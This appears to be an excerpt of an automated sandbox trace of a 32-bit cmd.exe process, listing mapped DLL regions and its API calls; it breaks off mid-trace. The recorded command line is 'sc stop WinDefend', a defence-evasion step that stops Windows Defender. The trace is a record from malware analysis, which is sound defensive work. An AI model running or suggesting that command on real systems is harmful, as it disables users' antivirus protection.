"\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2718 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2719 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2720 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2721 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2722 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2723 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2724 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2725 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2726 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2727 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2728 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2729 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2730 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2731 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2732 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2733 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 2734 start_va = 0x6b0000 end_va = 0x837fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2735 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2736 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2737 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2738 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2739 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2740 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2741 start_va = 0x840000 end_va = 0x9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2742 start_va = 0x9d0000 end_va = 0x1dcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 2743 start_va = 0x1dd0000 end_va = 0x2112fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 2746 start_va = 0x2120000 end_va = 0x23eefff entry_point = 0x2120000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 151 os_tid = 0x884 [0128.779] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbbc | out: lpSystemTimeAsFileTime=0x18fbbc*(dwLowDateTime=0xef411ef0, dwHighDateTime=0x1d4be3a)) [0128.779] GetCurrentProcessId () returned 0x874 [0128.779] GetCurrentThreadId () returned 0x884 [0128.779] GetTickCount () returned 0x2cadc [0128.779] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbb4 | out: lpPerformanceCount=0x18fbb4*=1820615100000) returned 1 [0128.780] GetModuleHandleA (lpModuleName=0x0) returned 0x4a550000 [0128.781] __set_app_type (_Type=0x1) [0128.781] __p__fmode () returned 0x75ca31f4 [0128.781] __p__commode () returned 0x75ca31fc [0128.781] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5721a6) returned 0x0 [0128.781] __getmainargs (in: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c, _DoWildCard=0, _StartInfo=0x4a574140 | out: _Argc=0x4a574238, _Argv=0x4a574240, _Env=0x4a57423c) returned 0 [0128.781] GetCurrentThreadId () returned 0x884 [0128.781] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x884) returned 0x60 [0128.781] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0128.781] GetProcAddress (hModule=0x76540000, lpProcName="SetThreadUILanguage") returned 0x7656a84f [0128.781] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.782] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.782] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb4c | out: phkResult=0x18fb4c*=0x0) returned 0x2 [0128.782] VirtualQuery (in: lpAddress=0x18fb83, lpBuffer=0x18fb1c, dwLength=0x1c | out: lpBuffer=0x18fb1c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.782] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fb1c, dwLength=0x1c | out: lpBuffer=0x18fb1c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0128.782] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fb1c, dwLength=0x1c | out: lpBuffer=0x18fb1c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0128.782] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fb1c, dwLength=0x1c | out: lpBuffer=0x18fb1c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.782] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fb1c, dwLength=0x1c | out: lpBuffer=0x18fb1c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0128.782] GetConsoleOutputCP () returned 0x1b5 [0128.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0128.782] SetConsoleCtrlHandler (HandlerRoutine=0x4a56e72a, Add=1) returned 1 [0128.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.782] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0128.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.783] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5741ac | out: lpMode=0x4a5741ac) returned 1 [0128.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0128.783] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.783] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5741b0 | out: lpMode=0x4a5741b0) returned 1 [0128.783] _get_osfhandle (_FileHandle=0) returned 0x3 [0128.783] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0128.783] GetEnvironmentStringsW () returned 0x5c1f50* [0128.784] FreeEnvironmentStringsW (penv=0x5c1f50) returned 1 [0128.784] GetEnvironmentStringsW () returned 0x5c1f50* [0128.784] FreeEnvironmentStringsW (penv=0x5c1f50) returned 1 [0128.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eabc | out: phkResult=0x18eabc*=0x68) returned 0x0 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x0, lpData=0x18eac8*=0x0, lpcbData=0x18eac0*=0x1000) returned 0x2 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x1, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x0, lpData=0x18eac8*=0x1, lpcbData=0x18eac0*=0x1000) returned 0x2 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x0, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x40, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x40, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.784] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x0, lpData=0x18eac8*=0x40, lpcbData=0x18eac0*=0x1000) returned 0x2 [0128.784] RegCloseKey (hKey=0x68) returned 0x0 [0128.784] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eabc | out: phkResult=0x18eabc*=0x68) returned 0x0 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x0, lpData=0x18eac8*=0x40, lpcbData=0x18eac0*=0x1000) returned 0x2 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x1, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x0, lpData=0x18eac8*=0x1, lpcbData=0x18eac0*=0x1000) returned 0x2 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x0, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x9, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x4, lpData=0x18eac8*=0x9, lpcbData=0x18eac0*=0x4) returned 0x0 [0128.785] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eac4, lpData=0x18eac8, lpcbData=0x18eac0*=0x1000 | out: lpType=0x18eac4*=0x0, lpData=0x18eac8*=0x9, lpcbData=0x18eac0*=0x1000) returned 0x2 [0128.785] RegCloseKey (hKey=0x68) returned 0x0 [0128.785] time (in: timer=0x0 | out: timer=0x0) returned 0x5c5b0e6f [0128.785] srand (_Seed=0x5c5b0e6f) [0128.785] GetCommandLineW () returned="/c sc stop WinDefend" [0128.785] GetCommandLineW () returned="/c sc stop WinDefend" [0128.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.785] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5c1f58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0128.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.786] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.786] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0128.786] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0128.786] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0128.786] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0128.786] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0128.786] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0128.786] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0128.786] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0128.786] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0128.786] GetEnvironmentStringsW () returned 0x5c2168* [0128.786] FreeEnvironmentStringsW (penv=0x5c2168) returned 1 [0128.786] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.786] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.786] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.786] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.786] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.787] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.787] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.787] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.787] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.787] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.787] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f888 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x18f888, lpFilePart=0x18f884 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18f884*="system32") returned 0x13 [0128.787] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0128.787] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604) returned 0x5b07f0 [0128.787] FindClose (in: hFindFile=0x5b07f0 | out: hFindFile=0x5b07f0) returned 1 [0128.787] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604) returned 0x5b07f0 [0128.787] FindClose (in: hFindFile=0x5b07f0 | out: hFindFile=0x5b07f0) returned 1 [0128.787] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0128.853] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0128.853] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0128.853] GetEnvironmentStringsW () returned 0x5c2168* [0128.853] FreeEnvironmentStringsW (penv=0x5c2168) returned 1 [0128.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a575260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.853] GetConsoleOutputCP () returned 0x1b5 [0128.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a574260 | out: lpCPInfo=0x4a574260) returned 1 [0128.853] GetUserDefaultLCID () returned 0x409 [0128.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a574950, cchData=8 | out: lpLCData=":") returned 2 [0128.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f9c8, cchData=128 | out: lpLCData="0") returned 2 [0128.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f9c8, cchData=128 | out: lpLCData="0") returned 2 [0128.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f9c8, cchData=128 | out: lpLCData="1") returned 2 [0128.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a574940, cchData=8 | out: lpLCData="/") returned 2 [0128.854] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a574d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a574d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a574d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a574cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a574c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a574c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a574c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a574930, cchData=8 | out: lpLCData=".") returned 2 [0128.855] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a574920, cchData=8 | out: lpLCData=",") returned 2 [0128.855] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.856] GetConsoleTitleW (in: lpConsoleTitle=0x5b1030, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.856] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76540000 [0128.856] GetProcAddress (hModule=0x76540000, lpProcName="CopyFileExW") returned 0x76573b92 [0128.856] GetProcAddress (hModule=0x76540000, lpProcName="IsDebuggerPresent") returned 0x76554a5d [0128.856] GetProcAddress (hModule=0x76540000, lpProcName="SetConsoleInputExeNameW") returned 0x7656a79d [0128.857] _wcsicmp (_String1="sc", _String2=")") returned 74 [0128.857] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0128.857] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0128.857] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0128.857] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0128.857] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0128.857] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0128.858] GetConsoleTitleW (in: lpConsoleTitle=0x18f6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.858] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0128.858] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0128.858] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0128.858] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0128.858] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0128.858] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0128.858] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0128.858] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0128.859] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0128.859] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0128.859] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0128.859] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0128.859] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0128.859] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0128.859] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0128.859] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0128.859] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0128.859] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0128.859] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0128.859] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0128.859] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0128.859] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0128.859] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0128.859] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0128.859] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0128.859] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0128.859] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0128.859] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0128.859] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0128.859] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0128.859] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0128.859] _wcsicmp (_String1="sc", _String2="START") returned -17 [0128.859] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0128.859] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0128.859] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0128.859] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0128.859] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0128.859] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0128.859] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0128.859] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0128.859] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0128.859] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0128.860] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0128.860] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0128.860] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0128.860] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0128.860] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0128.860] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0128.860] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0128.860] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0128.860] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0128.860] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0128.860] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0128.860] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0128.860] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0128.860] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0128.860] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0128.860] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0128.860] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0128.860] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0128.860] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0128.860] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0128.860] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0128.860] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0128.860] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0128.860] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0128.860] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0128.860] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0128.860] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0128.860] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0128.860] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0128.860] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0128.860] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0128.860] _wcsicmp (_String1="sc", _String2="START") returned -17 [0128.860] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0128.860] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0128.861] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0128.861] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0128.861] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0128.861] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0128.861] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0128.861] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0128.861] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0128.861] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0128.861] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0128.861] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0128.861] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0128.861] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0128.861] SetErrorMode (uMode=0x0) returned 0x0 [0128.861] SetErrorMode (uMode=0x1) returned 0x0 [0128.861] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5c4cb0, lpFilePart=0x18f1e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18f1e0*="system32") returned 0x13 [0128.861] SetErrorMode (uMode=0x0) returned 0x1 [0128.862] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a580640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.862] 